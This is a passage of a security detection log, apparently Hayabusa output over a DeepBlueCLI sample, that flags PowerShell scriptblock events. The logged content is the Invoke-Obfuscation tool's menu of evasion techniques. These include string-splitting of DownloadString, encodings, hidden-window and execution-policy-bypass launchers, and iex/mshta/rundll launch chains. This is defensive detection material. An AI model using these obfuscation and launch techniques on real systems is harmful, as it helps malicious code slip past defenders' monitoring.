<('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. '",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. 
<('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. <.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , ' entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. 
$MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as "" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as "" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as "" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as "" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as "" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as "" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as "" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. 
$MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + | Clip && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set && Cmd | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + | Clip && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() $MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. 
<.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , ' entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. $MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as "" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as "" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as "" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as "" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as "" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as "" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as "" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. 
$MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + | Clip && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set && Cmd | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + | Clip && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() $MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
